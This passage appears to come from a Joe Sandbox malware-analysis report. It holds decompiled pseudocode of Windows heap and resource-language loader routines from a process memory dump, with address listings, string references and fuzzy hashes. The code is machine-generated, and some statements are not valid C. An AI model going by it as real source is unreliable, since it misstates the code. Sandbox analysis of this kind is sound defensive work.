														_t702 =  *(_t759 - 0xdc);
														 *(_t759 - 0xac) = _t702;
														 *(_t759 - 0xbc) =  *(_t759 - 0xe0);
														if( *(_t759 - 0xd8) != 0) {
															E04CAFABA(_t759 - 0xdc, _t759 - 0xd8, 0x8000);
															_t702 =  *(_t759 - 0xdc) +  *(_t759 - 0xd8);
															 *(_t759 - 0xac) = _t702;
															 *(_t759 - 0xbc) =  *(_t759 - 0xe0) -  *(_t759 - 0xd8);
														}
														_t447 = _t702;
														 *(_t759 - 0xcc) = _t447;
														_t631 = _t702;
														 *(_t759 - 0xc0) = _t631;
														goto L49;
													}
												}
												goto L172;
											}
											if(_t693 != 0) {
												_t444 = _t444 | 0x80000000;
												 *(_t759 - 0xb0) = _t444;
											}
											asm("sbb ecx, ecx");
											 *(_t759 - 0xd0) =  ~_t693 & _t693;
											asm("sbb ecx, ecx");
											_t629 = ( ~_t693 & 0xffffffe8) + 0x270;
											 *(_t759 - 0xc8) = ( ~_t693 & 0xffffffe8) + 0x270;
											goto L42;
										}
									}
								}
								 *((intOrPtr*)(_t759 - 0x90)) = 0x7f000;
								goto L29;
							}
							_t774 =  *0x4da6960 - _t424; // 0x0
							if(_t774 >= 0) {
								__eflags = _t692 & 0xfff80c00;
								if((_t692 & 0xfff80c00) == 0) {
									goto L9;
								}
								_t592 =  *[fs:0x30];
								__eflags =  *(_t592 + 0xc);
								if( *(_t592 + 0xc) == 0) {
									_push("HEAP: ");
									E04CAB910();
								} else {
									E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("!(CheckedFlags & ~HEAP_CREATE_VALID_MASK)");
								E04CAB910();
								__eflags =  *0x4da5da8; // 0x0
								if(__eflags == 0) {
									_t686 = 2;
									E04D6FC95(0, _t686, _t718, __eflags);
								}
								_t692 =  *(_t759 - 0xb0);
							}
							if((_t692 & 0xfff80c00) != 0) {
								 *(_t759 - 0xb0) = _t692 & 0x0007f3ff;
							}
							goto L9;
						}
					}
					if(( *0x4da6938 & 0x00000001) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L4;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L4;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							L135:
							_t424 = 2;
							__eflags =  *(_t759 - 0xb4);
							if( *(_t759 - 0xb4) == 0) {
								_t742 = _t759 - 0x4c;
							}
							goto L5;
						}
						_t605 = E04D70A4D(_t718);
						__eflags = _t605;
						if(_t605 == 0) {
							goto L4;
						}
						goto L135;
					}
					goto L4;
				}
				L1:
				_t769 =  *0x4da3744; // 0x0
				if(_t769 != 0) {
					__eflags = _t718 - 1;
					if(_t718 == 1) {
						asm("sbb eax, eax");
						_t718 = _t718 &  !( ~(_t691 & 0x00000100));
					}
				}
				goto L2;
			}

0x04cc0f90
0x04cc0f95
0x04cc0f9a
0x04cc0f9f
0x04cc0fa2
0x04cc0fa8
0x04cc0fab
0x04cc0fb1
0x04cc0fb4
0x04cc0fba
0x04cc0fc0
0x04cc0fc3
0x04cc0fc9
0x04cc0fcc
0x04cc0fd2
0x04cc0fd8
0x04cc0fe4
0x04cc0fec
0x04cc0ff2
0x04cc0ffa
0x04cc1000
0x04cc1006
0x04d15459
0x04d1545f
0x00000000
0x00000000
0x04d15465
0x04d1546b
0x00000000
0x00000000
0x04d15477
0x04d1547f
0x04d15485
0x04d15487
0x04d15489
0x04d1548b
0x04cc17d4
0x04cc17d4
0x04cc17da
0x04cc17da
0x04cc17e0
0x04cc17e0
0x04cc17e8
0x04d15a49
0x04d15a4b
0x04d15a52
0x04d15a52
0x04d15a4b
0x04cc17f5
0x04d15a5c
0x04d15a5e
0x04d15a64
0x04d15a7c
0x04d15a7c
0x04d15a5e
0x04cc17fb
0x04cc17fd
0x04cc1800
0x04cc180c
0x04cc180c
0x04d15491
0x04d15494
0x04d154af
0x04d154af
0x04cc1992
0x04cc1992
0x00000000
0x04cc1992
0x04d15496
0x04d15498
0x04d1549e
0x04cc1018
0x04cc1018
0x04cc101e
0x04cc1024
0x04cc102c
0x04d154d7
0x04d154da
0x00000000
0x00000000
0x04d154e0
0x04d154e6
0x00000000
0x00000000
0x04d154ec
0x04d154ee
0x00000000
0x00000000
0x04d154f4
0x04d154fa
0x00000000
0x00000000
0x04d15500
0x04d15506
0x00000000
0x00000000
0x04d1550c
0x04d1550f
0x04d15511
0x04d15518
0x04d1551c
0x04d1551c
0x04d1551c
0x04d1551e
0x04d15520
0x04d1553a
0x00000000
0x04d15522
0x04d15522
0x04d15526
0x04d1552b
0x04d1552d
0x00000000
0x00000000
0x04d1552f
0x04cc103f
0x04cc1041
0x04cc1042
0x04cc1044
0x04d15584
0x04d15586
0x04d1558a
0x04d1558e
0x04d15598
0x04d15599
0x04d1559c
0x04d155a0
0x04d155a7
0x04d155a7
0x04d155a7
0x04d155a7
0x04d155ab
0x04d155af
0x04d155f8
0x04d155fa
0x04d15600
0x04d15606
0x04d15608
0x04d1560a
0x04d1560a
0x04d1560c
0x04d1560e
0x04d15610
0x04d15610
0x04d1562f
0x04d15631
0x04d15633
0x04d15640
0x04d15645
0x04d15649
0x04d15651
0x04d15656
0x04d15656
0x04d15649
0x00000000
0x04d155b1
0x04d155b1
0x04d155b7
0x00000000
0x00000000
0x04d155cc
0x04d155da
0x04d155e2
0x04d155ea
0x00000000
0x04d155ea
0x04d155af
0x04cc1050
0x04cc106a
0x04cc106c
0x04cc1076
0x04cc107b
0x04cc1080
0x04cc1932
0x04cc1935
0x04cc1937
0x04cc193b
0x04cc1944
0x04cc1944
0x04cc1944
0x04cc1946
0x04cc1946
0x04cc1086
0x04cc108c
0x04cc1095
0x04d15707
0x04d1570a
0x04d1570a
0x04cc109e
0x04d15715
0x04d15718
0x04d15718
0x04cc10af
0x04d15723
0x04d15725
0x04d15725
0x04cc10b8
0x04d15730
0x04d15735
0x04d15735
0x04cc10c0
0x04d15740
0x04d15745
0x04d15745
0x04cc10c6
0x04cc10cd
0x04d15755
0x04d15755
0x04cc10d3
0x04cc10e1
0x04cc10e6
0x04cc10e6
0x04cc10f3
0x04cc10f8
0x04cc10f8
0x04cc1105
0x04cc110d
0x04cc110d
0x04cc111a
0x04cc1122
0x04cc1122
0x04cc1128
0x04cc112f
0x04d15760
0x04d1576a
0x04d1576b
0x04d15770
0x04d15771
0x04d15772
0x04d15777
0x04d15779
0x00000000
0x00000000
0x04d1577f
0x04d15782
0x04d15787
0x04d15787
0x04cc113c
0x04cc1146
0x04cc1146
0x04cc1153
0x04d15791
0x04d1579b
0x04cc1163
0x04cc1163
0x04cc116b
0x04cc1815
0x04cc1815
0x04cc1171
0x04cc1177
0x04cc117f
0x04cc1958
0x04cc1185
0x04cc1185
0x04cc118b
0x04cc118b
0x04cc1191
0x04cc1197
0x04cc119b
0x04d157a6
0x04d157a8
0x04d157ae
0x04d157ae
0x04cc11a1
0x04cc11a7
0x04cc11af
0x04cc182d
0x04cc11bd
0x04cc11bd
0x04cc11c7
0x04cc11d1
0x04cc11d9
0x04cc11df
0x04d157bb
0x04d157c1
0x04d157c1
0x04cc11df
0x04cc11e7
0x00000000
0x04cc11f5
0x04cc11fa
0x04d157cc
0x04d157d1
0x00000000
0x00000000
0x04d157ea
0x00000000
0x04d157ea
0x04cc1200
0x04cc1200
0x04cc120a
0x04cc1212
0x04cc1820
0x04cc1822
0x04cc1243
0x04cc1245
0x04cc1838
0x04cc183f
0x04d1580b
0x04d15811
0x04d15813
0x00000000
0x00000000
0x04d15819
0x04d1581f
0x04d15821
0x00000000
0x00000000
0x04d15827
0x04d15829
0x00000000
0x00000000
0x04d1582f
0x04d15831
0x00000000
0x00000000
0x04d15837
0x04d15840
0x04d15846
0x04d15853
0x04d15858
0x04cc197d
0x04cc197d
0x04cc18fa
0x04cc18fa
0x04cc1901
0x04cc1903
0x04cc190b
0x04cc1911
0x04cc1917
0x04cc133b
0x04cc133d
0x04cc13a0
0x04cc13a0
0x04cc13b3
0x04d158d4
0x04d158df
0x04d158f1
0x04d158f3
0x04d158fd
0x04d158fd
0x04cc13c2
0x04cc13c5
0x04cc13d6
0x04cc13df
0x04cc13e9
0x04cc13f3
0x04cc1406
0x04cc140f
0x04cc1421
0x04cc142f
0x04cc143a
0x04cc1444
0x04cc1451
0x04d15915
0x04d1591e
0x04d15922
0x04d15922
0x04cc1457
0x04cc1464
0x04cc1471
0x04cc147b
0x04cc1487
0x04cc148c
0x04cc148f
0x04cc1497
0x04cc149c
0x04cc149f
0x04cc14a7
0x04cc14ac
0x04cc14af
0x04cc14b7
0x04cc14bc
0x04cc14bf
0x04cc14c1
0x04cc14c9
0x04cc14f3
0x04cc14f9
0x04cc1505
0x04cc154e
0x00000000
0x00000000
0x04cc1560
0x04cc1925
0x04cc192a
0x04cc1566
0x04cc1569
0x04cc156c
0x04cc157a
0x04cc1580
0x04cc158b
0x04cc1598
0x04cc15a8
0x04cc15b7
0x04cc15c9
0x04cc15db
0x04cc15ea
0x04cc15ff
0x04cc1614
0x04cc1620
0x04cc1630
0x04cc1643
0x04d15933
0x04d15933
0x04cc1649
0x04cc164f
0x04cc165b
0x04d1593b
0x04d1594b
0x04cc1661
0x04cc1661
0x04cc1671
0x04cc1671
0x04cc167b
0x04cc1685
0x04d1595a
0x04d15961
0x04d15961
0x04cc168b
0x04cc1699
0x04cc16a6
0x04cc16b2
0x04cc16be
0x04cc16c6
0x04cc16ca
0x04cc16d8
0x04cc1720
0x04cc172c
0x04cc1733
0x04cc1738
0x04cc1739
0x04cc1748
0x00000000
0x00000000
0x04cc174e
0x04cc1753
0x04cc175a
0x04d15975
0x04cc1760
0x04cc1760
0x04cc1760
0x04cc1765
0x04d1597f
0x04d15985
0x04d1598c
0x00000000
0x00000000
0x04d15997
0x04d15999
0x04d159a4
0x04d159a4
0x04d159a4
0x04d159ba
0x04d159c8
0x00000000
0x04cc176b
0x04cc176b
0x04cc176b
0x04cc1771
0x04cc1771
0x04cc1776
0x04cc177d
0x04d159db
0x04cc1783
0x04cc1783
0x04cc1783
0x04cc1788
0x04d159ea
0x04d159ec
0x04d159f7
0x04d159f7
0x04d159f7
0x04d15a15
0x04d15a15
0x04cc1795
0x04d15a28
0x04cc179b
0x04cc179b
0x04cc179b
0x04cc17a3
0x04d15a3f
0x04d15a3f
0x04cc17af
0x04cc17bc
0x04cc17c2
0x04cc17c8
0x04cc17ce
0x00000000
0x04cc17ce
0x04cc16da
0x04cc16f5
0x04cc1701
0x04cc1709
0x00000000
0x00000000
0x04cc170f
0x04cc1719
0x00000000
0x04cc1719
0x04cc14d0
0x04cc14d0
0x04cc14e4
0x04d154a9
0x00000000
0x04d154a9
0x04cc14ea
0x04cc14ed
0x00000000
0x04cc14ed
0x04cc14c9
0x04cc1341
0x04cc1349
0x04cc134a
0x04cc1355
0x04cc1356
0x04cc135d
0x04cc135e
0x04cc1367
0x00000000
0x00000000
0x04cc1374
0x04d1588c
0x04cc137a
0x04cc137a
0x04cc137a
0x04cc1382
0x04d15897
0x04d1589d
0x04d158a4
0x04d158be
0x04d158be
0x04d158a4
0x04cc1394
0x04cc139a
0x00000000
0x04cc139a
0x04cc1845
0x04cc1846
0x04cc184e
0x04cc184f
0x04cc1850
0x04cc1851
0x04cc1853
0x04cc1858
0x04cc185a
0x00000000
0x00000000
0x04cc1860
0x04cc1866
0x04cc186c
0x04cc186e
0x00000000
0x00000000
0x04cc1874
0x04cc187e
0x00000000
0x00000000
0x04cc1886
0x04cc1891
0x04cc1897
0x04cc1963
0x04cc1969
0x04cc196f
0x04cc1975
0x04cc1977
0x04cc1988
0x04cc198a
0x04cc198a
0x04cc1979
0x04cc197b
0x00000000
0x00000000
0x00000000
0x00000000
0x04cc197b
0x04cc189d
0x04cc18a3
0x04cc18a9
0x04d15860
0x04d15867
0x00000000
0x00000000
0x04d1586d
0x04cc18b2
0x04cc18b7
0x04cc18ba
0x04cc18bb
0x04cc18c3
0x04cc18c4
0x04cc18c6
0x04cc18c7
0x04cc18c9
0x04cc18ce
0x04cc18d0
0x00000000
0x00000000
0x04cc18dc
0x04cc18e2
0x04cc18e8
0x04cc18ee
0x04cc18ee
0x04cc18f4
0x00000000
0x04cc18f4
0x04cc124b
0x04cc1257
0x04d15804
0x04d15804
0x00000000
0x04d15804
0x04cc1262
0x04cc1272
0x04cc1275
0x04cc127b
0x04cc1281
0x04cc1283
0x04cc128b
0x04d15872
0x04d15878
0x04d15878
0x04cc1291
0x04cc1299
0x04cc12a3
0x04cc12ab
0x04cc12ac
0x04cc12b7
0x04cc12b8
0x04cc12bf
0x04cc12c0
0x04cc12c9
0x00000000
0x04cc12cf
0x04cc12cf
0x04cc12d5
0x04cc12e1
0x04cc12ee
0x04cc1302
0x04cc130d
0x04cc1313
0x04cc1325
0x04cc1325
0x04cc132b
0x04cc132d
0x04cc1333
0x04cc1335
0x00000000
0x04cc1335
0x04cc12c9
0x00000000
0x04cc1828
0x04cc121a
0x04d157f4
0x04d157f9
0x04d157f9
0x04cc1224
0x04cc1228
0x04cc1232
0x04cc1237
0x04cc123d
0x00000000
0x04cc123d
0x04cc11e7
0x04d157a1
0x04cc1159
0x00000000
0x04cc1159
0x04cc1052
0x04cc1058
0x04d1565d
0x04d15663
0x00000000
0x00000000
0x04d15669
0x04d1566f
0x04d15672
0x04d15691
0x04d15696
0x04d15674
0x04d15689
0x04d1568e
0x04d1569c
0x04d156a1
0x04d156a7
0x04d156ad
0x04d156b1
0x04d156b2
0x04d156b2
0x04d156b7
0x04d156b7
0x04cc1064
0x04d156c8
0x04d156c8
0x00000000
0x04cc1064
0x04d15520
0x04cc1039
0x04d15542
0x04d15545
0x00000000
0x00000000
0x04d1554b
0x04d15551
0x00000000
0x00000000
0x04d15557
0x04d15559
0x04d1556a
0x04d1556c
0x04d1556d
0x04d15573
0x04d15579
0x04d15579
0x00000000
0x04d15573
0x04d1555d
0x04d15562
0x04d15564
0x00000000
0x00000000
0x00000000
0x04d15564
0x00000000
0x04cc1039
0x04cc100c
0x04cc100c
0x04cc1012
0x04d154ba
0x04d154bd
0x04d154cc
0x04d154d0
0x04d154d0
0x04d154bd
0x00000000

Strings

@, xrefs: 04D15860
HEAP: , xrefs: 04D15691
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 04D1569C
HEAP[%wZ]: , xrefs: 04D15684

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 2994545307-3570731704
Opcode ID: c32bb4b2ae2a76fe1d16832509c7aaf660d1cda6a5693c95cad16072e176970d
Instruction ID: 3ecf967de17bc0384e7ef4e49434df4951d732332972c12d52851c27db92fde4
Opcode Fuzzy Hash: c32bb4b2ae2a76fe1d16832509c7aaf660d1cda6a5693c95cad16072e176970d
Instruction Fuzzy Hash: 4A926A71A00268DFEB24CF19DC50BA9B7B6BF85314F0981E9D949A7391DB34AE80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04CBA2E0 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04CBA2E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12) {
				char _v12;
				char* _v16;
				char _v20;
				char* _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v81;
				signed int _v84;
				void* _v88;
				void* _v89;
				signed short _v92;
				char _v93;
				void* _v100;
				void* _v101;
				intOrPtr* _t122;
				signed char* _t123;
				signed char* _t125;
				intOrPtr* _t128;
				signed char* _t129;
				signed char* _t131;
				intOrPtr _t133;
				signed int _t139;
				signed short* _t159;
				intOrPtr _t163;
				signed int _t178;
				signed int _t183;

				_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_v48 = __edx;
				_v52 = __ecx;
				_v64 = 0;
				_v28 = 0x3a0038;
				_v24 = L"LdrResFallbackLangList Enter";
				_v20 = 0x380036;
				_v16 = L"LdrResFallbackLangList Exit";
				if(_t122 != 0) {
					if( *_t122 == 0) {
						goto L1;
					}
					_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t123 & 0x00000001) != 0) {
						if(E04CC3C40() == 0) {
							_t125 = 0x7ffe0384;
						} else {
							_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E04D3FC01( &_v28,  *_t125 & 0x000000ff);
					}
					_t159 = _a12;
					if(_t159 == 0) {
						_t163 = 0xc000000d;
						_v68 = 0xc000000d;
						goto L35;
					} else {
						_t183 = 0;
						 *_t159 = 0;
						_t159[0x102] = 0;
						_v60 = 0;
						_v68 = 0;
						_v81 = 0;
						_v56 = 0;
						while(1) {
							L5:
							_v72 = 0;
							while(1) {
								L6:
								_t139 = _t183;
								_t178 = _t183;
								_t183 = _t183 + 1;
								if(_t139 > 7) {
									break;
								}
								switch( *((intOrPtr*)(_t139 * 4 +  &M04CBA60C))) {
									case 0:
										__ax = _a4;
										_v64 = 1;
										goto L14;
									case 1:
										if((_a8 & 0x00000004) != 0) {
											 *((char*)(__ebx + 0x204)) = 1;
											goto L34;
										}
										if((_a4 & 0x000003ff) != 0) {
											__edx =  &_v76;
											 *((char*)(__ebx + 0x204)) = 1;
											if(E04CA88C8(__ecx, __edx) < 0) {
												goto L34;
											}
											__ax = _v76;
											_v72 = __ax;
											__eax = _v72;
											if(__ax != 0) {
												__esi = __edi;
											} else {
												__esi = __esi | 0xffffffff;
											}
											L30:
											_v64 = 2;
											goto L15;
										}
										__eax = 0xeeee;
										_v72 = 0xeeee;
										goto L30;
									case 2:
										_v80 = 0;
										if(E04CBA630() == 0) {
											goto L24;
										}
										_t166 = _v60;
										if(_v60 >= ( *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff)) {
											goto L24;
										}
										E04CBA750( *( *[fs:0x18] + 0xfc0), _t166,  &_v80,  &_v81);
										_t149 = _v92 & 0x0000ffff;
										_v84 = _t149;
										if(_t149 == 0) {
											goto L24;
										}
										if(_v81 != 0) {
											if((_a8 & 0x00100000) != 0) {
												_v72 = 0xeeee;
												_t149 = _v72;
											}
										}
										_v60 = _v60 + 1;
										_t183 = _t178;
										_v64 = 3;
										goto L15;
									case 3:
										__eax = _v52;
										if(__eax == 0) {
											L24:
											_v72 = 0xeeee;
											goto L6;
										}
										__edx = _v48;
										 &_v36 =  &_v44;
										__ecx = __eax;
										__eax = E04CBA1E3(__ecx, __edx,  &_v44,  &_v36, _a8);
										if(__eax >= 0) {
											 &_v12 = E04CF5050(__ecx,  &_v12, _v44);
											 &_v48 =  &_v20;
											__eax = E04CD56E0( &_v20,  &_v48);
											if(__al == 0) {
												_v68 = 0xc00b0005;
												goto L24;
											}
											__ax =  *((intOrPtr*)(__esp + 0x3c));
											_v72 = __eax;
											_v80 = __ax;
											if((_a8 & 0x00100000) != 0) {
												__edx =  *[fs:0x18];
												 &_v81 =  &_v80;
												__edx =  *( *[fs:0x18] + 0xfc0);
												__eax = E04CBA750(__edx, 0,  &_v80,  &_v81);
												if(_v93 == 0) {
													__ax = _v80;
													_v72 = __eax;
												} else {
													__eax = 0xeeee;
													_v72 = __ax;
												}
											}
											__eax = _v36;
											__al = __al & 0x00000001;
											__al & 0x000000ff =  ~(__al & 0x000000ff);
											asm("sbb eax, eax");
											 ~(__al & 0x000000ff) & 0x00000006 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											_v64 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											__eax = _v72;
											goto L15;
										}
										goto L24;
									case 4:
										__eax = 0xeeee;
										_v80 = __ax;
										__eax = _a8;
										__eax =  !_a8;
										if((__eax & 0x00080000) != 0) {
											goto L34;
										}
										if( *[fs:0x18] == 0) {
											__ax = _v80;
											goto L5;
										}
										__eax =  *[fs:0x18];
										__ax =  *((intOrPtr*)(__eax + 0xc4));
										goto L14;
									case 5:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v56;
										_push( &_v56);
										_push(1);
										__eax = E04CF2AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__ax = _v56;
										goto L14;
									case 6:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v32;
										_push( &_v32);
										_push(0);
										__eax = E04CF2AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__eax = _v32;
										if(__eax == _v56) {
											goto L6;
										}
										L14:
										_v72 = __eax;
										L15:
										if(_t149 == 0xeeee) {
											goto L6;
										}
										goto L16;
									case 7:
										__eax = 0x409;
										_v72 = __ax;
										L16:
										_t179 =  *_t159 & 0x0000ffff;
										_t168 = 0;
										_t175 = _t179;
										if(_t175 == 0) {
											L20:
											if(_t179 >= 0x40) {
												goto L34;
											}
											 *((short*)(_t159 + 4 + _t175 * 8)) = _v72;
											 *(_t159 + 8 + ( *_t159 & 0x0000ffff) * 8) = _v64;
											 *_t159 =  *_t159 + 1;
											goto L6;
										} else {
											_t152 =  &(_t159[2]);
											while(1) {
												_t179 =  *_t159 & 0x0000ffff;
												if( *_t152 == _v72) {
													break;
												}
												_t168 = _t168 + 1;
												_t152 =  &(_t152[4]);
												if(_t168 < _t175) {
													continue;
												}
												goto L20;
											}
											if(_t168 < _t175) {
												goto L6;
											}
											goto L20;
										}
								}
							}
							L34:
							_t163 = _v68;
							L35:
							_t128 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t128 != 0) {
								if( *_t128 == 0) {
									goto L36;
								}
								_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								L37:
								if(( *_t129 & 0x00000001) != 0) {
									if(E04CC3C40() == 0) {
										_t131 = 0x7ffe0384;
									} else {
										_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									E04D3FC01( &_v20,  *_t131 & 0x000000ff);
									_t133 = _v68;
								} else {
									_t133 = _t163;
								}
								return _t133;
							}
							L36:
							_t129 = 0x7ffe0385;
							goto L37;
						}
					}
				}
				L1:
				_t123 = 0x7ffe0385;
				goto L2;
			}

0x04cba2f4
0x04cba2f7
0x04cba2fb
0x04cba2ff
0x04cba307
0x04cba30f
0x04cba317
0x04cba31f
0x04cba329
0x04d129f7
0x00000000
0x00000000
0x04d12a06
0x04cba334
0x04cba337
0x04d12a17
0x04d12a29
0x04d12a19
0x04d12a22
0x04d12a22
0x04d12a35
0x04d12a35
0x04cba33d
0x04cba342
0x04d12a3f
0x04d12a44
0x00000000
0x04cba348
0x04cba34a
0x04cba34e
0x04cba351
0x04cba357
0x04cba35b
0x04cba35f
0x04cba363
0x04cba367
0x04cba367
0x04cba367
0x04cba370
0x04cba370
0x04cba370
0x04cba372
0x04cba374
0x04cba378
0x00000000
0x00000000
0x04cba37e
0x00000000
0x04cba3ff
0x04cba403
0x00000000
0x00000000
0x04cba4af
0x04d12b05
0x00000000
0x04d12b05
0x04cba4bc
0x04d12a52
0x04d12a56
0x04d12a64
0x00000000
0x00000000
0x04d12a6a
0x04d12a6f
0x04d12a77
0x04d12a7b
0x04d12a85
0x04d12a7d
0x04d12a7d
0x04d12a7d
0x04cba4cb
0x04cba4cb
0x00000000
0x04cba4cb
0x04cba4c2
0x04cba4c7
0x00000000
0x00000000
0x04cba387
0x04cba393
0x00000000
0x00000000
0x04cba39f
0x04cba3af
0x00000000
0x00000000
0x04cba3cd
0x04cba3d2
0x04cba3d7
0x04cba3de
0x00000000
0x00000000
0x04cba3e9
0x04d12a93
0x04d12a9e
0x04d12aa3
0x04d12aa3
0x04d12a93
0x04cba3ef
0x04cba3f3
0x04cba3f5
0x00000000
0x00000000
0x04cba46a
0x04cba470
0x04cba492
0x04cba497
0x00000000
0x04cba497
0x04cba475
0x04cba47e
0x04cba483
0x04cba485
0x04cba48c
0x04cba5b5
0x04cba5bf
0x04cba5c4
0x04cba5cb
0x04d12aee
0x00000000
0x04d12aee
0x04cba5d8
0x04cba5dd
0x04cba5e1
0x04cba5e6
0x04d12aac
0x04d12ab8
0x04d12abd
0x04d12ac5
0x04d12acf
0x04d12ae0
0x04d12ae5
0x04d12ad1
0x04d12ad1
0x04d12ad6
0x04d12ad6
0x04d12acf
0x04cba5ec
0x04cba5f0
0x04cba5f5
0x04cba5f7
0x04cba5fc
0x04cba5ff
0x04cba603
0x00000000
0x04cba603
0x00000000
0x00000000
0x04cba4d8
0x04cba4dd
0x04cba4e2
0x04cba4e5
0x04cba4ec
0x00000000
0x00000000
0x04cba4f6
0x04d12afb
0x00000000
0x04d12afb
0x04cba4fc
0x04cba502
0x00000000
0x00000000
0x04cba53c
0x04cba541
0x04cba546
0x04cba54a
0x04cba54b
0x04cba54d
0x04cba552
0x04cba558
0x00000000
0x00000000
0x04cba55e
0x00000000
0x00000000
0x04cba568
0x04cba56d
0x04cba572
0x04cba576
0x04cba577
0x04cba579
0x04cba57e
0x04cba584
0x00000000
0x00000000
0x04cba58a
0x04cba592
0x00000000
0x00000000
0x04cba40b
0x04cba40b
0x04cba40f
0x04cba417
0x00000000
0x00000000
0x00000000
0x00000000
0x04cba59d
0x04cba5a2
0x04cba41d
0x04cba41d
0x04cba420
0x04cba422
0x04cba426
0x04cba444
0x04cba448
0x00000000
0x00000000
0x04cba456
0x04cba45e
0x04cba462
0x00000000
0x04cba428
0x04cba428
0x04cba430
0x04cba437
0x04cba43a
0x00000000
0x00000000
0x04cba43c
0x04cba43d
0x04cba442
0x00000000
0x00000000
0x00000000
0x04cba442
0x04cba4a3
0x00000000
0x00000000
0x00000000
0x04cba4a9
0x00000000
0x04cba37e
0x04cba50e
0x04cba50e
0x04cba512
0x04cba518
0x04cba51d
0x04d12b14
0x00000000
0x00000000
0x04d12b23
0x04cba528
0x04cba52b
0x04d12b34
0x04d12b46
0x04d12b36
0x04d12b3f
0x04d12b3f
0x04d12b52
0x04d12b57
0x04cba531
0x04cba531
0x04cba531
0x04cba539
0x04cba539
0x04cba523
0x04cba523
0x00000000
0x04cba523
0x04cba367
0x04cba342
0x04cba32f
0x04cba32f
0x00000000

Strings

LdrResFallbackLangList Exit, xrefs: 04CBA31F
8, xrefs: 04CBA307
LdrResFallbackLangList Enter, xrefs: 04CBA30F
6, xrefs: 04CBA317

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c52cb70c11b9c810fd415821f176bf8b61be7bcff04992d90327e6664eb136bb
Instruction ID: 29c9ec40eb963e2046468087aa50ac5dc5bd90b915d7b2ba34e6da2660769c37
Opcode Fuzzy Hash: c52cb70c11b9c810fd415821f176bf8b61be7bcff04992d90327e6664eb136bb
Instruction Fuzzy Hash: EDC19070208381DFD721CF15C040BAAB7E6FF84704F04896AF8D69B650E736EA49DB96

Uniqueness

Uniqueness Score: -1.00%

Function 04CE8322 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04CE8322() {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v200;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char* _v236;
				intOrPtr _v240;
				char _v244;
				signed short _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				intOrPtr _v272;
				short _v274;
				char _v276;
				signed int _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v293;
				intOrPtr _v297;
				intOrPtr _v308;
				intOrPtr _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t77;
				signed int _t83;
				void* _t85;
				void* _t88;
				signed int _t94;
				signed short _t102;
				char _t113;
				void* _t127;
				void* _t137;
				void* _t138;
				intOrPtr _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t153;
				void* _t154;
				intOrPtr _t158;
				signed int _t160;
				void* _t163;

				_t162 = (_t160 & 0xfffffff8) - 0x124;
				_v8 =  *0x4dab370 ^ (_t160 & 0xfffffff8) - 0x00000124;
				_t137 = 0;
				_v264 = 0;
				_v280 = 0;
				_t163 =  *0x4da5d70 - _t137; // 0x0
				if(_t163 != 0) {
					L18:
					_t77 = 0;
					L16:
					_pop(_t149);
					_pop(_t153);
					_pop(_t138);
					return E04CF4B50(_t77, _t138, _v8 ^ _t162, _t147, _t149, _t153);
				}
				_push( &_v260);
				_push(0);
				_push(0);
